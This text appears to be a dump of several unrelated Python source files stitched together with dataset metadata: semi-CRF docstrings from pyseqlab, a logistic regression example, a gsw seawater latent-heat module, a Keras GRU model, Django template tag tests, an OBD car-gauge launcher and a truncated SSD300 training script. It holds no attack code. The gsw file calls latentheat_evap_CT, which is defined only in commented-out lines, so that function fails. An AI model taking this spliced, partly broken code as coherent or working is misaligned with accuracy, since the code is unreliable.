@author: <NAME> <<EMAIL>> Model representation that will hold data structures to be used in :class:`HOSemiCRF` class Attributes: P_codebook: set of proper prefixes of the elements in the set of patterns :attr:`Z_codebook` e.g. {'':0, 'P':1, 'L':2, 'O':3, 'L|O':4, ...} P_codebook_rev: reversed codebook of :attr:`P_codebook` e.g. {0:'', 1:'P', 2:'L', 3:'O', 4:'L|O', ...} P_len: dictionary comprising the length (i.e. number of elements) of elements in :attr:`P_codebook` e.g. {'':0, 'P':1, 'L':1, 'O':1, 'L|O':2, ...} P_elems: dictionary comprising the composing elements of every prefix in :attr:`P_codebook` e.g. {'':('',), 'P':('P',), 'L':('L',), 'O':('O',), 'L|O':('L','O'), ...} P_numchar: dictionary comprising the number of characters for every prefix in :attr:`P_codebook` e.g. {'':0, 'P':1, 'L':1, 'O':1, 'L|O':3, ...} f_transition: a dictionary representing forward transition data structure having the form: {pi:{pky, (pk, y)}} where pi represents the longest prefix element in :attr:`P_codebook` for pky (representing the concatenation of elements in :attr:`P_codebook` and :attr:`Y_codebook`) pky_codebook: generate a codebook for the elements of the set PY (the product of set P and Y) pi_pky_map: a map between P elements and PY elements z_pky_map: a map between elements of the Z set and PY set it has the form/template {ypattern:[pky_elements]} z_pi_piy_map: a map between elements of the Z set and PY set it has the form/template {ypattern:(pk, pky, pi)} # call super class setup and create the model representation Creates all maps and codebooks needed by the :class:`HOSemiCRFAD` class Args: modelfeatures: set of features defining the model states: set of states (i.e. tags) L: length of longest segment generate instance properties that will be later used by :class:`HOSemiCRFAD` class create set of forward states (referred to set P) and map each element to unique code P is set of proper prefixes of the elements in :attr:`Z_codebook` set # empty element # print("P_codebook ", P_codebook) generate reversed codebook of :attr:`P_codebook` get the properties of P set (proper prefixes) generate forward transition data structure Main tasks: - create a set PY from the product of P and Y sets - for each element in PY, determine the longest suffix existing in set P - include all this info in :attr:`f_transition` dictionary # pk_y= {} # for p in P_codebook: # for y in Y_codebook: # pk_y[(p, y)] = 1 # check suffix relation # check = self.check_suffix(p, ref_str) # print("f_transition ", f_transition) generate a codebook for the elements of the set PY (the product of set P and Y) generate a map between elements of the Z set and PY set # given that we demand to have a unigram label features then Z set will always contain Y elems # get number of characters in the pky # +1 is for the separator '|' # check suffix relation generate map between P elements and PY elements Main tasks: - for every element in PY, determine the longest suffix in P - determine the two components in PY (i.e. p and y element) - represent this info in a dictionary that will be used for forward/alpha matrix # convert list to numpy arrays # for i in range(2): # pi_pky_map[pi][i] = numpy.array(pi_pky_map[pi][i]) # pi_pky_map[pi] = tuple(pi_pky_map[pi]) filter/prune states and y features Args: activaed_states: dictionary containing possible active states/y features it has the form {patt_len:{patt_1, patt_2, ...}} accum_active_states: dictionary of only possible active states by position it has the form {pos_1:{state_1, state_2, ...}} boundary: tuple (u,v) representing the current boundary in the sequence # generate partition boundaries higher-order semi-CRF model that uses algorithmic differentiation in gradient computation Args: model: an instance of :class:`HOSemiCRFADModelRepresentation` class seqs_representer: an instance of :class:`SeqsRepresenter` class seqs_info: dictionary holding sequences info Keyword Arguments: load_info_fromdisk: integer from 0 to 5 specifying number of cached data to be kept in memory. 0 means keep everything while 5 means load everything from disk Attributes: model: an instance of :class:`HOSemiCRFADModelRepresentation` class weights: a numpy vector representing feature weights seqs_representer: an instance of :class:`pyseqlab.feature_extraction.SeqsRepresenter` class seqs_info: dictionary holding sequences info beam_size: determines the size of the beam for state pruning fun_dict: a function map def_cached_entities: a list of the names of cached entities sorted (descending) based on estimated space required in memory construct list of names of cached entities in memory compute the potential of active features in a specified boundary Args: w: weight vector (numpy vector) active_features: dictionary of activated features in a specified boundary # to consider caching the w_indx and fval as in cached_pf # get all pky's in coded format where z maintains a suffix relation with them compute the forward matrix (alpha matrix) Args: w: weight vector (numpy vector) seq_id: integer representing unique id assigned to the sequence .. note:: activefeatures need to be loaded first in :attr:`seqs.info` compute the backward matrix (beta matrix) Args: w: weight vector (numpy vector) seq_id: integer representing unique id assigned to the sequence .. note:: fpotential per boundary dictionary should be available in :attr:`seqs.info` compute the marginal (i.e. probability of each y pattern at each position) Args: seq_id: integer representing unique id assigned to the sequence .. note:: - fpotential per boundary dictionary should be available in :attr:`seqs.info` - alpha matrix should be available in :attr:`seqs.info` - beta matrix should be available in :attr:`seqs.info` - Z (i.e. P(x)) should be available in :attr:`seqs.info` compute the features expectations (i.e. expected count of the feature based on learned model) Args: seq_id: integer representing unique id assigned to the sequence P_marginals: probability matrix for y patterns at each position in time grad: numpy vector with dimension equal to the weight vector. It represents the gradient that will be computed using the feature expectation and the global features of the sequence .. note:: - activefeatures (per boundary) dictionary should be available in :attr:`seqs.info` - P_marginal (marginal probability matrix) should be available in :attr:`seqs.info` prune states that fall off the specified beam size Args: score_vec: score matrix beam_size: specified size of the beam (integer) # using argpartition as better alternative to argsort # identify top-k states/pi # get topk states decode sequences using viterbi decoder Args: w: weight vector (numpy vector) seq_id: integer representing unique id assigned to the sequence beam_size: integer representing the size of the beam Keyword Arguments: stop_off_beam: boolean indicating if to stop when the reference state \ falls off the beam (used in perceptron/search based learning) y_ref: reference sequence list of labels (used while learning) K: integer indicating number of decoded sequences required (i.e. top-k list) A* searcher with viterbi will be used to generate k-decoded list # records max score at every time step # the score for the empty sequence at time 0 is 1 # records where violation occurs -- it is 1-based indexing # case of exact search and decoding # reset pi_mat at every loop # vector of size len(pky) # print("f_potential[pky_c_list] ", f_potential[pky_c_list]) # print("delta[u-1, pk_c_list] ", delta[u-1, pk_c_list]) # print("vec ", vec) # print("argmax chosen ", argmax_ind) # print('pk_c ', pk_c) # print("backpointer ") # print(backpointer) # print("pi_mat") # print(pi_mat) # get the max for each pi across all segment lengths # print("delta ") # print(delta) # print("backtrack ") # print(back_track) # case of inexact search and decoding # tracks active states by boundary # reset pi_mat at every loop # vector of size len(pky) # print("argmax chosen ", argmax_ind) # print('pk_c ', pk_c) # update tracked active states -- to consider renaming it # get the max for each pi across all segment lengths # in case we are using viterbi for learning # decoding the sequence # print("y_decoded ", Y_decoded) # print('topk ', topK)
| 2.36781
| 2
|
examples/example_logical.py
|
Xamber/Bhaalgorn
| 0
|
6627610
|
import numpy as np
from regression import LogisticRegression
np.random.seed(123)
training_set_logic = np.array([
[0.5, 1.0, 1],
[0.5, 0.6, 1],
[0.6, 0.5, 1],
[1.0, 1.0, 1],
[0.1, 0.1, 0],
[0.1, 0.3, 0],
[0.2, 0.1, 0],
[0.0, 0.0, 0],
[0.4, 0.4, 0],
])
logical = LogisticRegression(training_set_logic)
logical.train_gradient(3000)
logical.show_info()
|
import numpy as np
from regression import LogisticRegression
np.random.seed(123)
training_set_logic = np.array([
[0.5, 1.0, 1],
[0.5, 0.6, 1],
[0.6, 0.5, 1],
[1.0, 1.0, 1],
[0.1, 0.1, 0],
[0.1, 0.3, 0],
[0.2, 0.1, 0],
[0.0, 0.0, 0],
[0.4, 0.4, 0],
])
logical = LogisticRegression(training_set_logic)
logical.train_gradient(3000)
logical.show_info()
|
none
| 1
| 2.94126
| 3
|
|
gsw/gibbs/isobaric.py
|
ocefpaf/python-gsw
| 35
|
6627611
|
<reponame>ocefpaf/python-gsw
# -*- coding: utf-8 -*-
from __future__ import division
from .conversions import CT_from_pt
from ..utilities import match_args_return
__all__ = ['latentheat_evap_t']
# 'latentheat_evap_CT',
# 'latentheat_melting',
#@match_args_return
#def latentheat_evap_CT(SA, CT):
# pass
#@match_args_return
#def latentheat_melting(SA, p):
# pass
@match_args_return
def latentheat_evap_t(SA, t):
"""
Calculates latent heat, or enthalpy, of evaporation at p = 0 (the
surface). It is defined as a function of Absolute Salinity, SA, and
in-situ temperature, t, and is valid in the ranges 0 < SA < 40 g/kg and
0 < CT < 42 deg C. The errors range between -0.4 and 0.6 J/kg.
Parameters
----------
SA : array_like
Absolute salinity [g kg :sup:`-1`]
t : array_like
in situ temperature [:math:`^\circ` C (ITS-90)]
Returns
-------
latentheat_evap_t : array_like
latent heat of evaporation [J kg :sup:`-1`]
References
----------
.. [1] IOC, SCOR and IAPSO, 2010: The international thermodynamic equation
of seawater - 2010: Calculation and use of thermodynamic properties.
Intergovernmental Oceanographic Commission, Manuals and Guides No. 56,
UNESCO (English), 196 pp. See section 3.39.
"""
CT = CT_from_pt(SA, t)
return latentheat_evap_CT(SA, CT)
if __name__ == '__main__':
import doctest
doctest.testmod()
|
# -*- coding: utf-8 -*-
from __future__ import division
from .conversions import CT_from_pt
from ..utilities import match_args_return
__all__ = ['latentheat_evap_t']
# 'latentheat_evap_CT',
# 'latentheat_melting',
#@match_args_return
#def latentheat_evap_CT(SA, CT):
# pass
#@match_args_return
#def latentheat_melting(SA, p):
# pass
@match_args_return
def latentheat_evap_t(SA, t):
"""
Calculates latent heat, or enthalpy, of evaporation at p = 0 (the
surface). It is defined as a function of Absolute Salinity, SA, and
in-situ temperature, t, and is valid in the ranges 0 < SA < 40 g/kg and
0 < CT < 42 deg C. The errors range between -0.4 and 0.6 J/kg.
Parameters
----------
SA : array_like
Absolute salinity [g kg :sup:`-1`]
t : array_like
in situ temperature [:math:`^\circ` C (ITS-90)]
Returns
-------
latentheat_evap_t : array_like
latent heat of evaporation [J kg :sup:`-1`]
References
----------
.. [1] IOC, SCOR and IAPSO, 2010: The international thermodynamic equation
of seawater - 2010: Calculation and use of thermodynamic properties.
Intergovernmental Oceanographic Commission, Manuals and Guides No. 56,
UNESCO (English), 196 pp. See section 3.39.
"""
CT = CT_from_pt(SA, t)
return latentheat_evap_CT(SA, CT)
if __name__ == '__main__':
import doctest
doctest.testmod()
|
en
| 0.537204
|
# -*- coding: utf-8 -*- # 'latentheat_evap_CT', # 'latentheat_melting', #@match_args_return #def latentheat_evap_CT(SA, CT): # pass #@match_args_return #def latentheat_melting(SA, p): # pass Calculates latent heat, or enthalpy, of evaporation at p = 0 (the surface). It is defined as a function of Absolute Salinity, SA, and in-situ temperature, t, and is valid in the ranges 0 < SA < 40 g/kg and 0 < CT < 42 deg C. The errors range between -0.4 and 0.6 J/kg. Parameters ---------- SA : array_like Absolute salinity [g kg :sup:`-1`] t : array_like in situ temperature [:math:`^\circ` C (ITS-90)] Returns ------- latentheat_evap_t : array_like latent heat of evaporation [J kg :sup:`-1`] References ---------- .. [1] IOC, SCOR and IAPSO, 2010: The international thermodynamic equation of seawater - 2010: Calculation and use of thermodynamic properties. Intergovernmental Oceanographic Commission, Manuals and Guides No. 56, UNESCO (English), 196 pp. See section 3.39.
| 2.432606
| 2
|
genart/tf/morph/model.py
|
dyf/genart
| 0
|
6627612
|
<reponame>dyf/genart
import tensorflow as tf
from tensorflow.keras.layers import LSTM, GRU, Dense, Bidirectional, Input, RepeatVector, TimeDistributed, Dropout
from tensorflow.keras.models import Sequential
from tensorflow.keras import Model
def MorphModel(input_shape):
return Sequential([
GRU(512, activation='relu', input_shape=(input_shape[0], input_shape[1]), return_sequences=True),
GRU(256, activation='sigmoid', return_sequences=False),
Dropout(0.2),
RepeatVector(input_shape[0]),
GRU(256, activation='relu', return_sequences=True),
GRU(512, activation='relu', return_sequences=True),
TimeDistributed(Dense(input_shape[1]))
])
|
import tensorflow as tf
from tensorflow.keras.layers import LSTM, GRU, Dense, Bidirectional, Input, RepeatVector, TimeDistributed, Dropout
from tensorflow.keras.models import Sequential
from tensorflow.keras import Model
def MorphModel(input_shape):
return Sequential([
GRU(512, activation='relu', input_shape=(input_shape[0], input_shape[1]), return_sequences=True),
GRU(256, activation='sigmoid', return_sequences=False),
Dropout(0.2),
RepeatVector(input_shape[0]),
GRU(256, activation='relu', return_sequences=True),
GRU(512, activation='relu', return_sequences=True),
TimeDistributed(Dense(input_shape[1]))
])
|
none
| 1
| 2.736704
| 3
|
|
tests/test_template.py
|
beproud/bpcommons
| 2
|
6627613
|
<reponame>beproud/bpcommons
#:coding=utf-8:
from __future__ import print_function
from django import VERSION as DJANGO_VERSION
from django.test import TestCase as DjangoTestCase
from django.template import TemplateSyntaxError
try:
from django.template import (
Lexer,
Parser,
)
except ImportError:
from django.template.base import (
Lexer,
Parser,
)
from django.template import Origin
from django.template.context import Context
class BaseTemplateTagTest(object):
def _make_origin(self):
return Origin("Commons Test", lambda x,y: ("<string>", "<string>"), "commons", [])
def _render_html(self, template_string, context={}):
# :(
if DJANGO_VERSION > (1,9):
from django.template.library import import_library
tag_lib = import_library('testapp.tags')
else: # DJANGO_VERSION > (1,7):
from django.template.base import import_library
tag_lib = import_library('testapp.tags')
if DJANGO_VERSION > (1,9):
lexer = Lexer(template_string)
else:
lexer = Lexer(template_string, self._make_origin())
parser = Parser(lexer.tokenize())
parser.add_library(tag_lib)
nodelist = parser.parse()
return nodelist.render(Context(context))
class DataTemplateTagTestCase(BaseTemplateTagTest, DjangoTestCase):
TEMPLATE_STRING = "<html><body>{% get_my_data 121 as my_data %}{{ my_data }}</body></html>"
BAD_TEMPLATE_STRING = "<html><body>{% get_my_data 121 my_data %}{{ my_data }}</body></html>"
def test_data_template_tag(self):
self.assertEqual(self._render_html(self.TEMPLATE_STRING), "<html><body>MY DATA</body></html>")
def test_bad_template_tag(self):
with self.assertRaises(TemplateSyntaxError):
print(self._render_html(self.BAD_TEMPLATE_STRING))
class KwargDataTemplateTagTestCase(BaseTemplateTagTest, DjangoTestCase):
TEMPLATE_STRING1 = "<html><body>{% get_my_kwarg_data 121 as my_data %}{{ my_data }}</body></html>"
TEMPLATE_STRING2 = "<html><body>{% get_my_kwarg_data 121 status='spam' as my_data %}{{ my_data }}</body></html>"
TEMPLATE_STRING3 = "<html><body>{% get_my_kwarg_data 121 other='eggs' as my_data %}{{ my_data }}</body></html>"
TEMPLATE_STRING4 = "<html><body>{% get_my_kwarg_data 121 status='spam' other='eggs' as my_data %}{{ my_data }}</body></html>"
TEMPLATE_STRING5 = "<html><body>{% get_my_kwarg_data 121 status=spam other=eggs as my_data %}{{ my_data }}</body></html>"
BAD_TEMPLATE_STRING1 = "<html><body>{% get_my_kwarg_data 121 my_data %}{{ my_data }}</body></html>"
BAD_TEMPLATE_STRING2 = "<html><body>{% get_my_kwarg_data %}{{ my_data }}</body></html>"
BAD_TEMPLATE_STRING3 = "<html><body>{% get_my_kwarg_data as my_data %}{{ my_data }}</body></html>"
BASE_HTML = "<html><body>%s</body></html>"
def test_kwarg_data_template_tag1(self):
self.assertEqual(self._render_html(self.TEMPLATE_STRING1), self.BASE_HTML % "121:None:other")
def test_kwarg_data_template_tag2(self):
self.assertEqual(self._render_html(self.TEMPLATE_STRING2), self.BASE_HTML % "121:spam:other")
def test_kwarg_data_template_tag3(self):
self.assertEqual(self._render_html(self.TEMPLATE_STRING3), self.BASE_HTML % "121:None:eggs")
def test_kwarg_data_template_tag4(self):
self.assertEqual(self._render_html(self.TEMPLATE_STRING4), self.BASE_HTML % "121:spam:eggs")
def test_kwarg_data_template_tag5(self):
self.assertEqual(self._render_html(self.TEMPLATE_STRING5, {"spam": "eggs", "eggs": "spam"}), self.BASE_HTML % "121:eggs:spam")
def test_bad_template_tag1(self):
with self.assertRaises(TemplateSyntaxError):
print(self._render_html(self.BAD_TEMPLATE_STRING1))
def test_bad_template_tag2(self):
with self.assertRaises(TemplateSyntaxError):
print(self._render_html(self.BAD_TEMPLATE_STRING2))
|
#:coding=utf-8:
from __future__ import print_function
from django import VERSION as DJANGO_VERSION
from django.test import TestCase as DjangoTestCase
from django.template import TemplateSyntaxError
try:
from django.template import (
Lexer,
Parser,
)
except ImportError:
from django.template.base import (
Lexer,
Parser,
)
from django.template import Origin
from django.template.context import Context
class BaseTemplateTagTest(object):
def _make_origin(self):
return Origin("Commons Test", lambda x,y: ("<string>", "<string>"), "commons", [])
def _render_html(self, template_string, context={}):
# :(
if DJANGO_VERSION > (1,9):
from django.template.library import import_library
tag_lib = import_library('testapp.tags')
else: # DJANGO_VERSION > (1,7):
from django.template.base import import_library
tag_lib = import_library('testapp.tags')
if DJANGO_VERSION > (1,9):
lexer = Lexer(template_string)
else:
lexer = Lexer(template_string, self._make_origin())
parser = Parser(lexer.tokenize())
parser.add_library(tag_lib)
nodelist = parser.parse()
return nodelist.render(Context(context))
class DataTemplateTagTestCase(BaseTemplateTagTest, DjangoTestCase):
TEMPLATE_STRING = "<html><body>{% get_my_data 121 as my_data %}{{ my_data }}</body></html>"
BAD_TEMPLATE_STRING = "<html><body>{% get_my_data 121 my_data %}{{ my_data }}</body></html>"
def test_data_template_tag(self):
self.assertEqual(self._render_html(self.TEMPLATE_STRING), "<html><body>MY DATA</body></html>")
def test_bad_template_tag(self):
with self.assertRaises(TemplateSyntaxError):
print(self._render_html(self.BAD_TEMPLATE_STRING))
class KwargDataTemplateTagTestCase(BaseTemplateTagTest, DjangoTestCase):
TEMPLATE_STRING1 = "<html><body>{% get_my_kwarg_data 121 as my_data %}{{ my_data }}</body></html>"
TEMPLATE_STRING2 = "<html><body>{% get_my_kwarg_data 121 status='spam' as my_data %}{{ my_data }}</body></html>"
TEMPLATE_STRING3 = "<html><body>{% get_my_kwarg_data 121 other='eggs' as my_data %}{{ my_data }}</body></html>"
TEMPLATE_STRING4 = "<html><body>{% get_my_kwarg_data 121 status='spam' other='eggs' as my_data %}{{ my_data }}</body></html>"
TEMPLATE_STRING5 = "<html><body>{% get_my_kwarg_data 121 status=spam other=eggs as my_data %}{{ my_data }}</body></html>"
BAD_TEMPLATE_STRING1 = "<html><body>{% get_my_kwarg_data 121 my_data %}{{ my_data }}</body></html>"
BAD_TEMPLATE_STRING2 = "<html><body>{% get_my_kwarg_data %}{{ my_data }}</body></html>"
BAD_TEMPLATE_STRING3 = "<html><body>{% get_my_kwarg_data as my_data %}{{ my_data }}</body></html>"
BASE_HTML = "<html><body>%s</body></html>"
def test_kwarg_data_template_tag1(self):
self.assertEqual(self._render_html(self.TEMPLATE_STRING1), self.BASE_HTML % "121:None:other")
def test_kwarg_data_template_tag2(self):
self.assertEqual(self._render_html(self.TEMPLATE_STRING2), self.BASE_HTML % "121:spam:other")
def test_kwarg_data_template_tag3(self):
self.assertEqual(self._render_html(self.TEMPLATE_STRING3), self.BASE_HTML % "121:None:eggs")
def test_kwarg_data_template_tag4(self):
self.assertEqual(self._render_html(self.TEMPLATE_STRING4), self.BASE_HTML % "121:spam:eggs")
def test_kwarg_data_template_tag5(self):
self.assertEqual(self._render_html(self.TEMPLATE_STRING5, {"spam": "eggs", "eggs": "spam"}), self.BASE_HTML % "121:eggs:spam")
def test_bad_template_tag1(self):
with self.assertRaises(TemplateSyntaxError):
print(self._render_html(self.BAD_TEMPLATE_STRING1))
def test_bad_template_tag2(self):
with self.assertRaises(TemplateSyntaxError):
print(self._render_html(self.BAD_TEMPLATE_STRING2))
|
en
| 0.582123
|
#:coding=utf-8: # :( # DJANGO_VERSION > (1,7):
| 2.128067
| 2
|
start_og.py
|
chan2565/obd_gui
| 0
|
6627614
|
<gh_stars>0
import obd
from obd_gui import (
window,
new_speed,
new_rpm,
new_coolant_temp,
new_engine_load,
new_intake_temp,
new_throttle_pos,
new_timing_adv,
conn_lbl,
)
try:
# Start async connection to OBD adapter
# connection = obd.Async(baudrate=9600)
connection = obd.Async()
# Set up codes to watch with callbacks
connection.watch(obd.commands.SPEED, callback=new_speed)
connection.watch(obd.commands.RPM, callback=new_rpm)
connection.watch(obd.commands.COOLANT_TEMP, callback=new_coolant_temp)
connection.watch(obd.commands.ENGINE_LOAD, callback=new_engine_load)
connection.watch(obd.commands.INTAKE_TEMP, callback=new_intake_temp)
connection.watch(obd.commands.THROTTLE_POS, callback=new_throttle_pos)
connection.watch(obd.commands.TIMING_ADVANCE, callback=new_timing_adv)
# connection.watch(obd.commands.ELM_VOLTAGE, callback=new_obd_voltage)
# connection.watch(obd.commands.FUEL_STATUS, callback=new_fuel_status)
# Start monitoring
connection.start()
conn_lbl.configure(text=connection.status())
except Exception:
conn_lbl.configure(text="ERROR CONNECTING")
# Start display
window.mainloop()
|
import obd
from obd_gui import (
window,
new_speed,
new_rpm,
new_coolant_temp,
new_engine_load,
new_intake_temp,
new_throttle_pos,
new_timing_adv,
conn_lbl,
)
try:
# Start async connection to OBD adapter
# connection = obd.Async(baudrate=9600)
connection = obd.Async()
# Set up codes to watch with callbacks
connection.watch(obd.commands.SPEED, callback=new_speed)
connection.watch(obd.commands.RPM, callback=new_rpm)
connection.watch(obd.commands.COOLANT_TEMP, callback=new_coolant_temp)
connection.watch(obd.commands.ENGINE_LOAD, callback=new_engine_load)
connection.watch(obd.commands.INTAKE_TEMP, callback=new_intake_temp)
connection.watch(obd.commands.THROTTLE_POS, callback=new_throttle_pos)
connection.watch(obd.commands.TIMING_ADVANCE, callback=new_timing_adv)
# connection.watch(obd.commands.ELM_VOLTAGE, callback=new_obd_voltage)
# connection.watch(obd.commands.FUEL_STATUS, callback=new_fuel_status)
# Start monitoring
connection.start()
conn_lbl.configure(text=connection.status())
except Exception:
conn_lbl.configure(text="ERROR CONNECTING")
# Start display
window.mainloop()
|
en
| 0.548562
|
# Start async connection to OBD adapter # connection = obd.Async(baudrate=9600) # Set up codes to watch with callbacks # connection.watch(obd.commands.ELM_VOLTAGE, callback=new_obd_voltage) # connection.watch(obd.commands.FUEL_STATUS, callback=new_fuel_status) # Start monitoring # Start display
| 2.440167
| 2
|
deep-learning-for-image-processing-master/pytorch_object_detection/ssd/train_ssd300.py
|
zpwithme/zzzzpppp
| 0
|
6627615
|
<reponame>zpwithme/zzzzpppp
import os
import datetime
import torch
import transforms
from my_dataset import VOC2012DataSet
from src import SSD300, Backbone
import train_utils.train_eval_utils as utils
from train_utils import get_coco_api_from_dataset
def create_model(num_classes=21, device=torch.device('cpu')):
# https://download.pytorch.org/models/resnet50-19c8e357.pth
# pre_train_path = "./src/resnet50.pth"
backbone = Backbone()
model = SSD300(backbone=backbone, num_classes=num_classes)
# https://ngc.nvidia.com/catalog/models -> search ssd -> download FP32
pre_ssd_path = "./src/nvidia_ssdpyt_fp32.pt"
if os.path.exists(pre_ssd_path) is False:
raise FileNotFoundError("nvidia_ssdpyt_fp32.pt not find in {}".format(pre_ssd_path))
pre_model_dict = torch.load(pre_ssd_path, map_location=device)
pre_weights_dict = pre_model_dict["model"]
# 删除类别预测器权重,注意,回归预测器的权重可以重用,因为不涉及num_classes
del_conf_loc_dict = {}
for k, v in pre_weights_dict.items():
split_key = k.split(".")
if "conf" in split_key:
continue
del_conf_loc_dict.update({k: v})
missing_keys, unexpected_keys = model.load_state_dict(del_conf_loc_dict, strict=False)
if len(missing_keys) != 0 or len(unexpected_keys) != 0:
print("missing_keys: ", missing_keys)
print("unexpected_keys: ", unexpected_keys)
return model.to(device)
def main(parser_data):
device = torch.device(parser_data.device if torch.cuda.is_available() else "cpu")
print("Using {} device training.".format(device.type))
if not os.path.exists("save_weights"):
os.mkdir("save_weights")
results_file = "results{}.txt".format(datetime.datetime.now().strftime("%Y%m%d-%H%M%S"))
data_transform = {
"train": transforms.Compose([transforms.SSDCropping(),
transforms.Resize(),
transforms.ColorJitter(),
transforms.ToTensor(),
transforms.RandomHorizontalFlip(),
transforms.Normalization(),
transforms.AssignGTtoDefaultBox()]),
"val": transforms.Compose([transforms.Resize(),
transforms.ToTensor(),
transforms.Normalization()])
}
VOC_root = parser_data.data_path
# check voc root
if os.path.exists(os.path.join(VOC_root, "VOCdevkit")) is False:
raise FileNotFoundError("VOCdevkit dose not in path:'{}'.".format(VOC_root))
train_dataset = VOC2012DataSet(VOC_root, data_transform['train'], train_set='train.txt')
# 注意训练时,batch_size必须大于1
batch_size = parser_data.batch_size
assert batch_size > 1, "batch size must be greater than 1"
# 防止最后一个batch_size=1,如果最后一个batch_size=1就舍去
drop_last = True if len(train_dataset) % batch_size == 1 else False
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8]) # number of workers
print('Using %g dataloader workers' % nw)
train_data_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=nw,
collate_fn=train_dataset.collate_fn,
drop_last=drop_last)
val_dataset = VOC2012DataSet(VOC_root, data_transform['val'], train_set='val.txt')
val_data_loader = torch.utils.data.DataLoader(val_dataset,
batch_size=batch_size,
shuffle=False,
num_workers=nw,
collate_fn=train_dataset.collate_fn)
model = create_model(num_classes=args.num_classes+1, device=device)
# define optimizer
params = [p for p in model.parameters() if p.requires_grad]
optimizer = torch.optim.SGD(params, lr=0.0005,
momentum=0.9, weight_decay=0.0005)
# learning rate scheduler
lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer,
step_size=5,
gamma=0.3)
# 如果指定了上次训练保存的权重文件地址,则接着上次结果接着训练
if parser_data.resume != "":
checkpoint = torch.load(parser_data.resume)
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])
parser_data.start_epoch = checkpoint['epoch'] + 1
print("the training process from epoch{}...".format(parser_data.start_epoch))
train_loss = []
learning_rate = []
val_map = []
# 提前加载验证集数据,以免每次验证时都要重新加载一次数据,节省时间
val_data = get_coco_api_from_dataset(val_data_loader.dataset)
for epoch in range(parser_data.start_epoch, parser_data.epochs):
mean_loss, lr = utils.train_one_epoch(model=model, optimizer=optimizer,
data_loader=train_data_loader,
device=device, epoch=epoch,
print_freq=50)
train_loss.append(mean_loss.item())
learning_rate.append(lr)
# update learning rate
lr_scheduler.step()
coco_info = utils.evaluate(model=model, data_loader=val_data_loader,
device=device, data_set=val_data)
# write into txt
with open(results_file, "a") as f:
# 写入的数据包括coco指标还有loss和learning rate
result_info = [str(round(i, 4)) for i in coco_info + [mean_loss.item()]] + [str(round(lr, 6))]
txt = "epoch:{} {}".format(epoch, ' '.join(result_info))
f.write(txt + "\n")
val_map.append(coco_info[1]) # pascal mAP
# save weights
save_files = {
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'lr_scheduler': lr_scheduler.state_dict(),
'epoch': epoch}
torch.save(save_files, "./save_weights/ssd300-{}.pth".format(epoch))
# plot loss and lr curve
if len(train_loss) != 0 and len(learning_rate) != 0:
from plot_curve import plot_loss_and_lr
plot_loss_and_lr(train_loss, learning_rate)
# plot mAP curve
if len(val_map) != 0:
from plot_curve import plot_map
plot_map(val_map)
# inputs = torch.rand(size=(2, 3, 300, 300))
# output = model(inputs)
# print(output)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description=__doc__)
# 训练设备类型
parser.add_argument('--device', default='cuda:0', help='device')
# 检测的目标类别个数,不包括背景
parser.add_argument('--num_classes', default=20, type=int, help='num_classes')
# 训练数据集的根目录(VOCdevkit)
parser.add_argument('--data-path', default='./', help='dataset')
# 文件保存地址
parser.add_argument('--output-dir', default='./save_weights', help='path where to save')
# 若需要接着上次训练,则指定上次训练保存权重文件地址
parser.add_argument('--resume', default='', type=str, help='resume from checkpoint')
# 指定接着从哪个epoch数开始训练
parser.add_argument('--start_epoch', default=0, type=int, help='start epoch')
# 训练的总epoch数
parser.add_argument('--epochs', default=15, type=int, metavar='N',
help='number of total epochs to run')
# 训练的batch size
parser.add_argument('--batch_size', default=4, type=int, metavar='N',
help='batch size when training.')
args = parser.parse_args()
print(args)
# 检查保存权重文件夹是否存在,不存在则创建
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
main(args)
|
import os
import datetime
import torch
import transforms
from my_dataset import VOC2012DataSet
from src import SSD300, Backbone
import train_utils.train_eval_utils as utils
from train_utils import get_coco_api_from_dataset
def create_model(num_classes=21, device=torch.device('cpu')):
# https://download.pytorch.org/models/resnet50-19c8e357.pth
# pre_train_path = "./src/resnet50.pth"
backbone = Backbone()
model = SSD300(backbone=backbone, num_classes=num_classes)
# https://ngc.nvidia.com/catalog/models -> search ssd -> download FP32
pre_ssd_path = "./src/nvidia_ssdpyt_fp32.pt"
if os.path.exists(pre_ssd_path) is False:
raise FileNotFoundError("nvidia_ssdpyt_fp32.pt not find in {}".format(pre_ssd_path))
pre_model_dict = torch.load(pre_ssd_path, map_location=device)
pre_weights_dict = pre_model_dict["model"]
# 删除类别预测器权重,注意,回归预测器的权重可以重用,因为不涉及num_classes
del_conf_loc_dict = {}
for k, v in pre_weights_dict.items():
split_key = k.split(".")
if "conf" in split_key:
continue
del_conf_loc_dict.update({k: v})
missing_keys, unexpected_keys = model.load_state_dict(del_conf_loc_dict, strict=False)
if len(missing_keys) != 0 or len(unexpected_keys) != 0:
print("missing_keys: ", missing_keys)
print("unexpected_keys: ", unexpected_keys)
return model.to(device)
def main(parser_data):
device = torch.device(parser_data.device if torch.cuda.is_available() else "cpu")
print("Using {} device training.".format(device.type))
if not os.path.exists("save_weights"):
os.mkdir("save_weights")
results_file = "results{}.txt".format(datetime.datetime.now().strftime("%Y%m%d-%H%M%S"))
data_transform = {
"train": transforms.Compose([transforms.SSDCropping(),
transforms.Resize(),
transforms.ColorJitter(),
transforms.ToTensor(),
transforms.RandomHorizontalFlip(),
transforms.Normalization(),
transforms.AssignGTtoDefaultBox()]),
"val": transforms.Compose([transforms.Resize(),
transforms.ToTensor(),
transforms.Normalization()])
}
VOC_root = parser_data.data_path
# check voc root
if os.path.exists(os.path.join(VOC_root, "VOCdevkit")) is False:
raise FileNotFoundError("VOCdevkit dose not in path:'{}'.".format(VOC_root))
train_dataset = VOC2012DataSet(VOC_root, data_transform['train'], train_set='train.txt')
# 注意训练时,batch_size必须大于1
batch_size = parser_data.batch_size
assert batch_size > 1, "batch size must be greater than 1"
# 防止最后一个batch_size=1,如果最后一个batch_size=1就舍去
drop_last = True if len(train_dataset) % batch_size == 1 else False
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8]) # number of workers
print('Using %g dataloader workers' % nw)
train_data_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=nw,
collate_fn=train_dataset.collate_fn,
